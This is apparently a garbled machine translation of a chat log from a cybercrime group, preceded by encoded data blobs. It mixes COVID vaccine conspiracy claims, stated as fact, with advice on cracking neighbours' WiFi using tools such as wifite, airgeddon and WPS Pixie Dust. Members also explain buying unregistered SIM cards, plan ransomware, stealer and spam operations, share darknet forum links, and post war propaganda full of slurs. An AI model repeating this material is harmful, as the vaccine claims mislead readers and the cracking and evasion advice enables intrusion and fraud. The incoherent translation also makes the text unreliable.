QHKrYeKxzTPtNyMTGQYa7OnewcP9cEcNA2uqGKJv+SEFjZcYMy9y8aqxrVx4+lghXaMB8hl6zaqa/h6rpN7MIeilRQz99vrjw1FG1BXd5i1"}{"$binary""iqgeZc5ua+57kXcFfC4/TU3BR4Ba0kJmxOnz3y6PIomOqttcvi5bGLQ+8Zgn/FSvlYwstjLUTKrOgzp7vandLKYopAhrUtHSBurSLtX1zMlotSIqlIGodTSqkGyMkAiy9zk1NKbZMAa6tdxDco6s6eSjcKh8ABo0Zr7vOYSpK2IMfxRl47kMgfJGgNLuYYbzttNd0IUg3HXLBq58iCXuJALcQI4OT/1b38tICCNgF1nDcsl98prDYP26f3E="}{"$binary":"DmErdDpf9bPXJMD8Em2ufQB8i+tACjXS5NVwC9v7/v91PVj/NnP63irVbxnpSTE23gd4cLqJo35wUuvwNs0xr+KZHHCW4AytXfkL1MCYhxfrqKeqLgKPdECVs9r9ngnxDO8y+5n0U9fd4sqXGjbkLC4X9q6akUqW2nt631Tde2GqKYvrWwAjOob8QgAylcYNnawj7kj6l6B5EGLV5CeRRTilKwUUbb7/UYGCDwg45qO50/gMH2dxvjWp5NRMOF9D05PavWu0Jwy0vx4zjA=="}{"$binary":"qiRoeE63I/FeZrYfwZko/+REMD0VPGePZK/j3xROQUMwtQOzDTPcAO64+stUdE5dMcQ1i/QD4Izm09tWUUP18KhSQNXuBitY5wpS9azLkDOxmDcnYNpvhO05RXeFxzZaW+5sZHBsQM5CWxOCOd6A233XkqWKLAXpoqAwLJ1p1wQWrxZTY/kB07xmYDpLiJfKBf+88L69EsI3Cd6dF34QbmefVigNlxM+E/I+J3uCn2wjK28IzvsXVpj2Tkvcp4cC24VhJG4+0IIT1q10hdEl2Ccn+Z4ciAQoqB7pTCuz0fQjbXR6FIObyO/XlvHjiJ1lSO0pu5RzkpGJvbmyGUrWVCITod2LU+QpYmrh67uMNISXVXy1s7oHZD5jAOIS3vYMowhfr15Vn4CwxX4OcwapbcgP68sCaKhgmg3MnNpJQUUX2ms="}{"$binary":"lEZRwHbiSY7XnGpApNObqymaQh4LMcPlR6kILIraXJBjp4jxgOBPc25agyqa9Q7clSixzO2zdVx6cgD1xSfeCegEJEnv0YLh/QvZBGV3GmUSRyvb2Dce7vpOK7aSBzeA0Njg5Y/yP5XmhtkJ8VSFZ8F0IH0DyST+s1yt0GzsaP8pw/IgqzoGh1X16KG664+D5QmURwzCa6DX4BWJLPRJRXrxewdm5uqo"}вот he's cyberpunk)That's what I mean too.

Curcod, all of us, against all odds and sorrows.
The same Gintsburg at first said that after his vaccine lifelong immunity, and even bequeathed to descendants :) -- he doesn't say that now. He says that the vaccine gives no guarantee and it is necessary to be constantly revaccinated.Yes "officials" have long contradicted themselves In Kazan and Saratov, they write that without QR-codes they are not allowed into banks and ATMs. There is a checker standing by the ATM. If you don't pass the test you will be turned away. Even so officials say that the vaccine offers no guarantee of infection and that a vaccinated person could just as easily be a carrier. Yesterday I went to the grocery store to buy chemicals and there was an ad on the door: QR on admission. Shopping malls, shopping malls, restaurants, cafes, all QR for the past 3 weeksPravda, where I live, on the outskirts of town, the worst that I met - the requirement to wear a mask in the supermarket. I live in a quite large city, unfortunately (the 2nd largest city in the region). That is why people are fleeing from large cities in droves, to "leave the system". In general, they plan to drive everyone to the metropolitan areas, to manage them more easily. Small towns and villages may drop out of civilization and turn into "big Somalia"... But first, the reservations, where would they be without them? They are already going to embed a photo in a QR code picture so that they could not use someone else's code. There is a need to draw at leisure what is necessary to scan your passportThere are the same initials, date of birth and a few digits of the passport series / number when scanning it showsWell it is not like a left one. It belongs to another person, an acquaintance. Not accurately expressed, I meant not with my nameGarfield left QR-code? You mean from some database that was leaked? All for the purpose of editing the DNA. For example, to suppress the action of certain genes, for example there is a certain "God gene", which seems to be responsible for religious fanfiction. This is the way Bill Gates proposes to prevent religious fanatics (there was a video "Bill Gates is going to correct the God gene"). And other genes, for example, want to develop obedience in the people, so that they do not protest. Yes, genetically conditioned caste system.I have a left QR, so far almost everywhere allow to pass. need to draw a passport more and in most cases it will pass. the question is whether for a long time so simply scan with your smartphone and allus so far many where passport is not required, somewhere even say "fuck, come in". but it's up to the first fines, major such liberties allow themselvesNo, the account in the centralized registry will include transcription of dnaNu not surprisingly so, if now QR scan often workers themselves shop / cafe, if it is small and there is no budget for a separate employee.
in the nearest future this will be tied to a state body or some other, where a person will not stand with a cell phone with a scanner geared specifically for this purpose. they went even further - a genetic passport. well yes, at first they wanted to introduce a universal smart card, then progress advanced and it became unnecessary / corporations / corporations / yes, now they issue QR codes, each time it is new. Then they want to make a system of identification ID2020 (https://id2020.org) from Microsoft and the corporations. There will be a person's account in the centralized registry, and the link to this account will eventually be encoded into a QR code.  Also, if you poke around the id2020 site, there is a link to a curious googledoc, with a tech requirement for the device. The description is very similar to an implanted chip.that immediately grabbed and carried for processinglevitirtsyayut sprut out of the matrix is being developed probably))) as cattle in the backyard began to track, like thisIt will be for example a drone flying down the streets and scanning people for "permission" to leave the housevmemory notes on fences / walls 4-6 years ago - in our city, all replete with the same phrase "we are against the UEC". Universal Electronic Card. That is what it stands for. We are now at a point where something like this has been implemented all over the place. QR is just a transitional link to more serious means of identificationThe essence of "inclusive capitalism" is the abolition of private property and a distributive economy. I.e., there will be no private property and no equity, no share in any enterprise. Instead of shareholders, there will be stake-holders -- secondary beneficiaries who have no stake. Personal homes and automobiles are going to be abolished. That is, there will be rented housing and carsharing. The middle class is being eliminated, no animals are allowed to be raised. (Have you heard there's now a law that says you can't raise animals on summer homes? -- now drones are flying around and tracking who has a chicken coop, who gets spotted -- fines). Social distancing is being introduced, everyone needs to stay home and not gather more than 3 people. All to take away the basics of self-sufficiency (personal farmstead and vegetable garden), so they are dependent on the system, plus the maximum to fragment society (so they do not protest). QR codes are another tool to cut off the dissatisfied from the social infrastructure. I meant to blame it on the virus, the "collapse of empires" and the economies of the world. of course, all the reasoning now is like a pitchfork in water, and when the true goal is achieved, our generation may not even see it. Although judging by the pace the situation will develop more rapidly day by day at the most miserable time, our kids may get stuck in the middle of it. Even the globalist ideologue Schwab talks about the transition from capitalism to "inclusive capitalism. There has been a collapse of capitalism and a change of formation to post-capitalism. Like any war, the goal is to drain the economy to zero, to bankrupt small and medium-sized businesses. So there will only be big monopolies and poor slaves, no middle class. That's their plan. In reality there is a lot of information on anti-covaccine channels about people who have died after vaccines, for example, the editor of Literary Gazette had a 19 year old grandson who died of heart failure two days after the injection. All kinds of thrombosis. If the thrombosis occurred in the brain, it can be a stroke, and can fall off a leg, an arm, you can go blind, and such cases have already been do not remember this game because of age. I just went to school in 96-97)))or 95mya in this still in 96m played, ahaha under Dosomi further will hushovalit that is possible, but the problem that will not resolve, and only aggravate http://www.youtube.com/watch?v=7uDrgNkQu14Свалить all on an unknown virus good idea sure. It seems to be the gist of the plan. My father's friend's elderly mother died right after the inoculation, and the frog was jumping on lilies to the anthems of the USSRperestroika was a child's gameCivil 2.0 ?)) and we'll get well) without these capitalists you can just make a coup, take from the rich and give to the poor, and go back a century after the nuclear war There are many things here. I see several objectives: to deal with the bankrupt dollar and to hold a new world war in the name of some of their own incomprehensible to ordinary people objectives for someone the vaccine can simply be a catalyst for the activation of any chronic diseases.
A friend at work, a man died specifically after the second dose was injected a couple of days later - first hand information, I have no reason not to believe this man For half a year they forgot what it was and all survived it just then no one had to stir up in 2001 or 2003 was SARS, the same everything, pulmonary edema, corona, masks I also heard about the globalists before and did not believe it until there was this hysteria about the world because of a non-scary disease.What's with the argument and no fight? They've gone from talking to acting... The keyboard's not working, the batteries are out...yes, yes, exactly, the so-called "golden billion theory promoted by the Rockefellers "golden billion may be for the best, but don't get me wrong, it's not a vaccine against a dangerous disease, it's a tool of population reduction by globalists I won't argue, everyone decides for himself, I'll go soon for revaccination factin pits your immune system against you, ie, it is a tool of genocide From factcin the public dies of autoimmune disorders Vaccine does not protect, it allows to transfer the disease on small side effects, in most cases I.e., factin does not help from a fashionable disease, but only makes it worse It is a lie, in hospitals 50% of patients - factinizedEremember, during the entire Afghan war, 15k soldiers died with the Russian vaccine?I read a statistic. 130 yap. population ~80% vaccinated, 0metrey a day, in russia every day titanic sinks ~1500 people according to the official. so they died from vaccination, mostly, and from the failure to provide medical care.
I see no reason not to get vaccinated, so many friends and loved ones were killed, ppts.Can we hold a poll? Like "who was vaccinated?") look at our dark statistics)https://stalingrad.site/articles/zagruzka-v-matritsu/качал image with mikes for 5 minOfigget, I download the studio via LTE - up to 6 mbs / sec. Something microsoft messed up obviously Considering, that I live not in big city, and there are no exchangers nearby Ask the exchanger to send the cache by courier - too expensive, it will have to pay the courier airfare "friend, take the money huh? I'll give you 500 rubles..."
"1500 and a bottle of good vodka!"or a friend kukukodnutsya to ask for cash and delivery) It turns out that soon and the paycheck will not be cashed. What to do? "From Tatarstan they say that people without kuarkods are not allowed into bank branches and ATMs to withdraw money. Similar things are happening in Saratov. Everything is happening much faster than we thought. We should not forget that Tatarstan is a testing ground for the whole of Russia. "but to break WPA2 on services, with their rigs, rather than race their vidyuhiPMKID good when you need MitM to produce and no customers, at dachas well exploit it, grab handshake, wifite and airgeddon solve it, the main thing to install all dependencies, there are these libshttp://www.opennet.ru/opennews/art.shtml?num=56217https://www.opennet.ru/opennews/art.shtml?num=56049единственно what is needed is normal wifi whistle, alfa for example,
https://www.wlan-shop24.de/alfa-network-awus036nha-wlan-usb-adapter-atheros-ar9271l
androids also something that is, but they screw up the points It is also desirable to have a good directional antenna, because already a lot of noise in the range PC or smart? wifite put and go first thing on the hole wps Pixie Dustk by the way, who tried the neighbor's wifi? I have 10 pieces catches the neighbor (some pass must be 123456789qQ)I have it all solved UbiquitiA who lets the wind in the internet?) Let him sit in a virtual machine you can use it only in the local loop and only under the question about old models / firmwareYes, Stas.Maga, but it is under the wind and drains all the gurmuot Stasyan router-scan? on the tree? I'm opposite in 800 metersEasy there is a convenient utility for win. router-scan. Very handy wps break if the whole house 100 apartments and 99 yuzayut internet and you do not, it's you know how tough palaver) * a decade I do not yuzayut your netmitzi, you have many "neighbors" pohuyu? The main thing on the balcony does not burn the antenna so it seems burned, not AI, and Indians outsource ... that one AI? in general, the problem with the internet solves Ubiquiti NanoStation or Ubiquiti NanoBridge M2
you put OpenWRT there something like airgeddon, reaver, wifite etc. Yes, with human degradation AI may well reach his level) the main thing is the result may even leak wherever he wants. this is the approach, such a neural network architecture I've nurtured the idea of creating a "cryptor" + "api checker" + "neuronka" for ages. now these gpt-2 gpt-3 already simulate blonde's brain very well
and even brunettes don't speak about clouds but about compiler's conscious decisionswe'll wait till it starts working without clouds you say it writes code for you
it is true that everything goes to the mice in the cloud, so there is an autopilot from the mice-even the call center at the sberbank is already an automated robot without people i have always thought about it and why not? Why haven't they invented something in coding in our sphere that will work for us? When we automate everything, we'll make neuroncuka retire) when I get bored, retire, get fired etc. I can imagine a security guard with a laptop in front of him) robot or not - it's a test, you can either laugh or cry... To be a security guard? Are we splitting up already?) well, the elite elite rzhd rather a fiver?i personally decided for myself that i'll join the security service, it's our age-old russian profession )fences, barriers and guards) no, barriers will not be demolished, they're our scrapes, barriers will be taken down, they will be treated as terroristsbut i'm talking about that or the barrier)) so they will sell SIM cards without a postal code )) no way out, they can figure out how, there are plenty of equipment that needs SIM cards and do not have an account on the government services
the laws and their implementation have always been different.prices will go up... so these are corporate sims and i want two phones, they won't sell them to me? well, the sims that were sold are not unknown and they have to be registered in their name or someone else's... as the Frenchman said

I've seen some people receive a text message with their passport to come to the office, we want to verify the data.

I get a call on my left SIM card and say, hey guy, you don't want credit, it's already approved at Musk's prices...so, the telcos can always defend themselves and include Ludwig Aristarkhovich and say, who did this? who did this? they'll make SIM cards without a name, on a white background, and who among the shoulder straps and civil servants will be able to understand the routing, because the technical experts here don't even understand how the fuck GSM is organized)...this is an interesting variant...it seems to me that the solution will be roaming )and then only to register for real people on the public services No, since December 1st there is a new law on the mandatory tariff, 1 sim - 1 login to the services.is there a law that will turn off all unknown sims all subscribers will go into a binge?anon, a lot of criminals need sims, and they will have to register them for each employee?! It can not be that so much money will go to waste...i.e., 2/3 of the profit According to some data, 2/3 of subscribers will fall off from the operators> From the 1st of this year, all this joy is going to be shut down...we'll see...
i wonder, but i think that very quickly a method of circumvention will be discovered, like wiseguys from prisons will be closed in other prisons? so it's better to go to the churks, they do not care, they have everything covered, they know all the local legals in the faces of such a tent salesmen are shy, they look whether you look like a legally
and if you look like a cop they tell you there's nothing. Sorry.
They are going to shut down all this joy starting from the 1st ... We'll see ... even the Ali-Express is selling SIM cards. What's up with that? :) At any phone repair shops, they sell SIM cards. And the sellers must register these SIM cards, otherwise they will be fined. There is a fight against gray SIM cards, so now you can buy and register a SIM card with your real data. I remember a guy who decided to sell a grenade launcher through Avito:)Through churks, it will work, they always have tons of SIM cards to call Tajikistan, you are not my brother, you black churka...
Buy a SIM card :grin:I did it that way, it works.
if you ask about SIM tents, they will not sell them, they are afraid of police so they have to sell registered SIMs, they have to sell them in tents that sell them for no reason all these stalls with shavukha moshetiyon will give you everything try to do it that way:
- look for a local gathering where salaam aleikum
Find the friendliest dude who tells you "you need figs, brother, turmeric, mursmullah, brother."
You say no brother, thank you from the bottom of your heart brother.
He says, what do you want, bro? I'll give you anything.
You say, "Brother, I need a SIM card, brother, I really need one from the soul" You can still buy one at the markets in major cities
I'm waiting for the 1st date and what will my SIM seller say, how will it all work in connection with the reguire\verf for services...Because local shops do not want to bypass the law, and the bruises go without passports for the internet ekspe sells wherever
https://exploitivzcm5dawzhe6c32bbylyggbjvh5dyvsvb5lkuz5ptmunkmqd.onion/forum/94/смотря in what city for the internet? Or just for a number? No one has seen where you can buy an activated SIM card online?eyJhbGciOiJB8QfJhvy16YFv5LgepxilkIboZ2/RcDqPudYtcCUPdzVHnxgt5pQO+UHki10ON38TALSt0MUXPrrY6Zl4FDIfqgTidLTHA67lV+byqBpoL2hQTyAZ18ez7/LkfGibGKNEP8vkrycCzGEXDG2twbEw6k81KOfd44isD1qxSUSgmuU=eyJhbGciOiJBcBkI5cAEN7qWu1gou7LTniNL0SIkJ6lQhGoYR7isKvLp16GAIQCmGynnW1GBwkNHWK4eF6s0kGsIfAJYjncO+JnTWj3C5ALAVQd3ImelBpeu8OeHIoG5XnBqcfWDzA3txxrlzUWzVIfHCxpXqir6C2DK+T2pDVkILMOgQ2RRXzA=eyJhbGciOiJB1+LQb/NxqDP3M4rD0cVOwtLEpQePLnQ1zVc9aBtYmik6iTspYdh/pXviU5NwSEYEWKoHQtksWWdVMa1fOFvAPuroXw1Zjq9QLLd/HQIBbSz2phDRXXYYjDnqLCv6aoCsomULGsgyH9XwfAGSTKfzLUhy/DB0bQreBaccEvBLNHqyY73xnCbq//RkFumvZfubfbrGzXV2zBQorcg7LPhJgYgKsjND7BFbVRoP15L1Me4iXhrNQNr0uL8zxD32QVkKeyJhbGciOiJBa6y+wzOn8r52gdtpbXm+KI7fcYFhR1+7zuyuSb+pfUI4AudaSe/enb9m+skHizGY5otbP8UpoLetowNOGdlpkIiqHsru404dAuzmk2GRTqRJ3cOtbC7MpMjmwc3Mjnq1oerNbD/JWgNJF8STW2BYwI0YzSfhAloOwBO0BdbX9WU=eyJhbGciOiJB4632DCTTbwv5/zHTIEFtMfKP2M+QnDtwXS+cBYyNw6v5oSleyQZZKRrPGNO/R6KukE2rVwdHLRQ5UfsR6/33CFnGntBrv0v5egJZ6jExl0vEfq1YueYpG0B3W2V7ROrllFm048bBxUulXcPWVC51RmrUxfLfVZ80nOOkMXGIiRygzfwVYkO33CIZ2PpnXzQ3 did the trampers give out?)good morning

Chinese Air Force fighters entered Taiwan's airspace, and naval ships invaded territorial waters.
Taiwan's defense ministry warned to increase alertness after the air defense detected nine Chinese fighter jets.

CNN, citing U.S. intelligence data, reports that Russia intends to begin air strikes on Kiev starting at 03:00 Ukrainian time...Good night bro, it's time to go, get up early tomorrow, sofa troops are not waiting to see =)@rags it?last joys will be taken away from us all, here we go)Some american senators suggest blocking PornHub in Russia in addition to social networks! :(You must have over 300 reactions to view hidden content.)))Who can send the link https://xss.is/threads/58221/ see sura =)Besides lockers now all topics seem dead - bankbots, stilers, etc. all this is already in the past
If I'm wrong, correct plz, maybe something I do not know if anyone has any thoughts do not hesitate to put =) =) pfft pfft pfft pock lots and lots of woods) it's good in Siberia, fresh air =) colleagues, go take a break for a while.as there is no law about crypto, you can excuse yourself more in case of a fuckupakripty collection and interception of all known wallets to work like a submarine, work and leave a trail more or less gray software can fuck off in short with the old software will be pale to resume work. your suggestions gentlemen?if you do not want to go to Siberia =) but the idea is clear paranoia should be there and while they are not at the cafe, they have installed torrent nodes on their bridges and fuck it =) or you can expose who did what if they spilled the money and they would work without lavishing, they would even rent a cafe to work when they had a lot of money and many eyes at oncethe ryuks have a new locker to get out from under the sanctions. they are still on the move. are you sure it was revil? well revil, they probably took it, maybe the boss had something to do with hzmg, no one took anyone else, the rest they already told themselves. they took them just because they showed off their posh life very strongly. the trick is that they could have asked us to work while the infrastructure is alive to earn something. because of the reception? there is a different question. The activity has stopped not only because of the money, it seems that there is some life here, even with such vague predictions for the future, and we are waiting, just do not die with boredom from Francis to wait for news ...=)my last name is too well known to be mentioned (s)here's where the people who wrote the crackers and other bullshit should worry if the chief got so fed up =)last name is not enikeev? I should have thrown it to zhabun in public, if it's a problem, here's my resume in a nutshell
php coder since 1998, engineer, programmer since 1980, higher education

I've been deep analyzing traffic on gmail servers, creating a mailer for yahoo and aol, and I'm close to the finish line

toad jameswatson@xmpp.jp, contact Atomik and other wallets What kind of software takes logs Lockers - it's more likely to be a fucking idiot Someone will make a leak for 20pfff so there would be less palaver Lockers are terrorism =)for super profits - noThere are other directions besides Lockers?There are other directions besides lokersKneel with recipients agree on a price and let's workAnd the admin panel of the software is alive? You can do it without the panel by handWell, recipients pay for crypts, it makes sense to try to repay them themselves without a paycheck, there will be no paycheckSecure your paycheck, and then deal with other issuesStyler to do shitCan also send stylersWhat options besides spam there?who does spam? not for a long time, really. are there any coders? what are you talking about? let's get the coders and the clients to work out the finances, e.g. cryptopanels and so on?i can fuck it up, i used to be a CFO :D the new chief will be either french or elroy so he could control the work =)Angelo make him a chief and a bookkeeper, we need a new chief =)we need Kolya if we can try to make something happen, what's the point of waiting for the weather?he's not sure yet, France said only that everything is in the fog =)or look for a new job with a salary or work for free now for perspective i can find them for sure i can find contacts of people with lockers, but there are nuances@angelo so look, we have the tools we haveShef gave big customers to solve the problem with spam and serversKere you are wrongDa what did he coordinate once a month, we'll organize through the pussyCorporated everything we have the tools so the chief only gave moneyChef, he mergedWhy has all the work stopped? besides money, what do we have? to give them access Anyone has contacts with the groups of lockers? there are only us!i don't have admin, software, spammers and proxy-type shit i'm a fucking companionable guy, i'm as reliable as a rock i got 16pffu we got a support team and a bunch of guys i can fuck around with, i offered to knock on my toad, who wants to communicate who has what? i suggest someone else responded?or we can organize ourselves in the course of the case is clear that the case is dark...because we do not work, just go on, loloporofli in chat while it works@Garfield look for a new job. it is unlikely it will resumeWorld is my wish.@all though, I certainly hope that our work with you will continue in the near future. And without any shit and, just as importantly, without any fans working to spread it in streams of incomprehensible air masses.I get it. why the fuck look for some work, right? let's give someone a fan and someone a shit. And we'll organize a watch. What do you think of this idea? I don't know if it's the next heart or whatever they have, or if they'd survive going down to the subway, or there'd be partisan units. What would she do?Fucking LEE: And what about Her Majesty Elizabeth II, by the grace of God of the United Kingdom of Great Britain and Northern Ireland and her other kingdoms and territories, the Queen, head of the Commonwealth, defender of the faith.This is not Europe, fuck it in the annals of history about China and so it is clear, he is as friendly as most of the Asians are to Russia. So fuck it. China is the same friend to the whole world, because this state has only recently begun its ascent in this form. :expressionless: At the same time - everyone knows how successful it is to fuck the guys from siberia and to fuck the men of the ragheads on their part, we still have to answer for the halcyon goal, to fuck, to buy the forest, We're just raw materials for them and nothing more. Only non-Communists can jerk off to them in the hope for a bright future. They are not even comrades, the Chinese are not our friends.)srkzm was flashed here where it's like a boa constrictor, it's like a boa constrictor, it's like a boa constrictor, it's like a boa constrictor, it's like they love the pindos and it's like a dubious deal)) yes nigger chinese will eat us up. they will not fuck us up at all.If you're trying to explain something to a patriot or talk sense into him, an old communist, then I have bad news for you. What's wrong with the ZHPPP? It constantly fucks up guys, haven't you ever driven around Moscow in the center using the navigator? All this would be funny if it weren't so sad. :copyright: in principle, all this was expected by the general public for at least the last 3 days.
The direct address to the whole world from the GDP sounded like a formal warning, within the framework of the signed agreements with the LDPR, but in the end it was an actual declaration of all the "yesterday's partners" already in the full light as the enemies of Russia. With all the ensuing consequences. Why did ours miss so badly? Well, seriously, or did someone just have a lost satellite connection on the contour maps? Did they fuck up or get lost? They are kind of defending the Dombas, so what are ours doing there?

The Ukrainian media confirm that the Antonov airfield in Gostomel near Kiev has been seized. They also report that ten IL-76 planes with Pskov paratroopers are flying there

Russia appears to be building up its grouping surrounding Kiev. The Ukrainian media confirm that the Antonov airport in Gostomel remains under the control of our military, despite attempts by the Ukrainian Armed Forces to dislodge them from there. At the same time, local newspapers report that ten IL-76 planes with Pskov paratroopers flew to the same airport.

If the storming of Kiev does not begin tonight, ten IL-76 planes, each carrying 225 paratroopers, can make such flights 3-4 times. It is not difficult to calculate that by morning there could be a 10-thousand-strong group of Russian troops within 15 km of the Ukrainian capital, which the AFU will have nothing to counter.Question to connoisseurs: "Just burn already, let me think of another riddle...Finally, what else to do... now you know the secret...) ah, that question was bothering me for a long time, if anything.. it seems. even a different frame highlighting is a kind of code and syntax is highlighted by a link must be that you yuse one quotation mark and I trino about the link that eeThe best But not blue [ ] (https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=PsRFwTXXBLPDJk5qJ) too i special took your link, locomotive) you first i bluestoyat blueexplain everyone in `https:// ` letter S blue ? what i threw down i see all in black font, thomas `S` is blue the first)`https://www.youtube.com/watch?v=N_xQUwdkAOg` is right !(s)ptz la konya plesnuda faggots they are all emotion guys. emotion:smile:not faggots in the sense with toras they are second row i got against toras[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=PfdMwi6ffLypPJp2k) well of course i'm against fags, you can not trust anybody woke up) one message can put a bunch of reactionsahaha hilariously you Weldon, I can not promise you, I will try, Steam Train on asvat write pol not tweet the main thing:copyright: how the fuck do i tweet?I have not reached Chernobyl yet-maybe from Chernobyl you still have artifacts, it's safer ... plutonium is unstable, plutonium is not stable, and the main thing is not to tweet ... How the heck do you use plutonium?plutonium is unstable, just asshole, so be careful there, if anythingHomer shared, all sorts of things, I'm better at plutonium@weldon work I can't remember a lecture by someone who has a direct relation to itwe have alcoholic beverages and they kill the body because of the second components you tell me when I see diamond heels:laughing:there the degree of purification and will be fucking great) so you just need to run it a couple of times try it I remember there is alcohol what's his Bryntsalova there is the Ministry of Defense I do not mean those and normal there are just different alcohols it can be technical and normal I do not know, the last time I took the Old Man 7 on New Year's Day, I would not say that the spirit how could be dirty?chemically dyed it just make it for the drudgesam alcohol dirty as trash water datakih TU sorry sorry home distill moonshine that no old man that no now all the lousy alcohol in the shopsstareyshina normal comrade) vodka do not drink exactly, cognac ordinary -ElderA))) or Elder, I do not understand the question of vigilance decide too, what if you also need airing, especially with your elder as a guest today@Garfield I drink cognac) Well, hz, vigilance vigilance. What's the difference? Like a wedge with a wedge? One vigil with another?well, the results of vigil you can weather periodically - a tiphack for you)) all the room is always awake in the chat, i believed in you guys, always on guard)) and brother there is something to help)) he went to ameruka, at a conference on iT technology, or you yourself lately here?))who is it? cuberbike overdid vodka?:laughing:do you need it? fuck the dollar 89 so those who are against us can not cope without usCNN broadcasts - Kiev airport taken without a fightV.tsoi - cool song what's up uraniumheads? Klitschko did not give birth to anything?)Cocks played):Thumbsup:Russian troops marched to the Dnieper, landed in Odessa and moved to the Kiev region
Chronicle of Ukraine's demilitarization operation, 24.02.2022, DAY (updated)
Russian troops have advanced 50-70 km deep into Ukraine in some directions and are occupying facilities
Russian tanks in Nova Kakhovka
A Russian flag is hoisted over the Kakhovka hydroelectric plant. It is reported that the Russian military are complacent, allowing them to take pictures, smiling.
It is also reported that Russian motorized infantry has been spotted in Antonovka, which is three kilometers from Kherson on the right bank of the Dnieper, that is, it is already on the other bank. And a little later came a report of a Russian flag over Kherson.
Russian landing from helicopters in the Kherson region
I would also remind you that Russian troops were found deep in the territory of Ukraine in the Chernigov region, In the vicinity of Kharkov and on the ring road of this city. The State Border Service of Ukraine reports the presence of Russian equipment in the Kiev region... SBU burns documents in the center of Kiev. Two Russian fighter jets flew over Vishneve and Zhulyany (western part of Kiev).
A mass of Russian helicopters over Gostomel, 5 km northwest of Kiev
The Black Sea port of Odessa under the control of Russian marines.
An APC of the AFU and a Russian Tiger burned on the road near Kharkiv
There was a strong explosion in Kiev. It was heard in different districts of the capital. As the adviser of the Minister of Internal Affairs Gerashchenko specifies, it was a rocket attack by the Russian Armed Forces on military facilities in Brovary.
Sources close to the Office of the President of Ukraine say that all launching positions of the Tochka-U operational-tactical missiles possessed by the AFU were destroyed, as well as all long-range missiles and air defense. All the coordinates were known to Russia.
The Ukrainian side is claiming the 7th (!) shooting down of a Russian plane, while all the "evidence" for the last six turned out to be rotten fakes of 1993 and 2011.
British Prime Minister Boris Johnson called an emergency NATO summit.
Lukashenko said he had received assurances from Putin that he would treat an attack on Belarus as a Russian attack. The Border Committee of Belarus said that all Ukrainian checkpoints on the border with Ukraine were closed indefinitely. The Belarusian Defense Ministry reported that it was decided to close part of the airspace for civil aircraft starting from 11:00 a.m. Kiev time on February 24.
Zelenski submitted to the Rada a bill on general mobilization. For those who have not had time to leave Ukraine - this is not good.
Moment of arrival of a Russian Air Force Kalibr missile at a military depot in an industrial zone in Odessa
Air combat over Kiev
`https://chervonec-001.livejournal.com/3977120.html`

As I wrote - it's the last day of the neo-Nazi junta. Do you want it??? take it away I told you - carefully, there is also about Alaska we sold it to the leasehusl we did not attack AlaskaThe question is different we started to restore the imbalance
`https://www.youtube.com/watch?v=NlcF5QBhTiI`
listen carefully, this is the end of the pindostanet of course, i told you right away = 2 missiles
1. on landon
2. on fascington the u.s.justifies our fucking? and what does serbia have to do with it? no way are you thinking with your other head?) now! I only think of my family.Boryspil and Brovary have been stormed.or don't you want to remember? @angelo when we "regretted" that schizo clinton bombed serbia with uranium bombs, don't you remember? yes kera, I am fucked up, deep down I regret what is happening.Air alert sirens again in Kiev.Russian strikes disabled 74 ground facilities of the AFU military infrastructure, including 11 Air Force airfields - Russian Defense Ministry What did you give him?
I think this is the first day when Angelo is really fucked up and is not jokingAnd he is waiting for it, it will be 5 years old, he will be standing (like Angelo's) I still have a piano from my grandfather at the cottage! @weldon you can make good money in rubles, people make good money by operating with news and in BTC, maybe you can keep your savings in Western companies, in foreign currency but you have the global economy in front of you.
They'll fuck up the devaluation and the paper will be garbage.
I have a colleague from there I had a partner in the ua, now I don't know what's wrong with him, and how we'll work and whether we'll work or not. Then there are no questions. Although you're not from sngkhule, what good are interviews and everything else if the results of your work are multiplied by 0. There's no savings and your finances depend on one man's shiz, you our salary depends on these events.
I don't care who's fighting who.
I don't even bother myself with it, I solve more pressing problems for myself - I go to interviews, do tests.
I think this is more productive than scrolling through news sites all day, reading who won and overthrew whom.
The whole country is now hooked on smartphones, every 5 minutes going to news sites for another dose of dopamine.
It would be fine if they just looked at the news, but under each news item there is a bunch of dirt about "the Kholokhlov, the Vatniks, the Moskals.
I remember leaving a comment there once calling for peace, but both "khoklys" and "muscals" pooed all over it.
Peace to the people of Ukraine, peace to the people of Russia, let all this bacchanalia end as soon as possible.oho440 servicemen of the Ukrainian Armed Forces requested a humanitarian corridor and crossed into the Rostov region.FSS RF reports that Ukrainian border guards have left all units at the Russian-Ukrainian border.agentura what documents?the SB on prorezna in kiev is burning documents in the courtyard lnr was attacked at night. don't read it better because of what all the news didn't read, but seriously want a trial over the junta. what do ours want? ours is already in gostomel, near kievomon for these purposes move the chat to ridonly. I do not have enough of this political faggot to go to turkey with a ruler) everything is clear, Zele is a gastuk, we need a 5-star horse)) I am a common worker, no demands, who are you to demand something from me?Questions above and not for Zelu, answer for yourself. Zelu will hide, it's his last day, ours is already in the suburbs of Kiev. money is bullshit in this matter. any such movement should be confirmed by deeds. and now you are just another spectator and instigator.So tell me about those people. the propaganda is here... sarcasm lol) loshugu did not serve, but at least ours served in the army. they are respectable people. in any case, we should not blame them for their normal professions.I'll remember, son, yesterday it was a sin not to drink, I'm trying not to sleep, enough bullshit... what the fuck is going on here? I don't even know what to discuss now... what's all the fuss about? 0 without 1 you trying to manage me, there is no such thing, if you want something, do it yourself what the fuck?
when the cocksucker is shown) from the court website we need off-the-record documents. It's fucking bullshit. It's rbc`https://www.rbc.ru/rbcfreenews/607dc6509a7947debfa01601`.
it's still under investigation, there's no court order. i don't know, i haven't read it.
don't open it, my knock@kermit do it yourself, I follow the movement of troops to Kyiv if you read it, I may find the wrong thing, I need exactly what you read it begins@kermit search yourself, a fucking court in which 99.5% of sentences are guilty, was there a trial?Are you threatening or welcoming, an independent expert confirmed the injection marks on the body and finger nails ripped out, the whole groin was burnt. what dags? there was one dag and a cleaver as a witness. i want links to the case. have you seen the pictures of the body? bring evidence, we will think like naive girls and we think china is our friend russia and Ukraine should be with europe, not china `https://www.youtube.com/watch?v=T3pYbzFrnQU`
me too
did china fully support russia at the united nations? The result is enmity and hunger on both sides. The plan was a success. All the testimonies in the cases were beaten out under torture. They don't count. Victory, but WITHOUT THE DEAD for which he was detained, or which were later opened. Welldon, did you fuck up there in the morning for victory, and what exactly is he doing?
so send me the fucking link to this propaganda, we don't watch TV@kermit read the case file, it's published
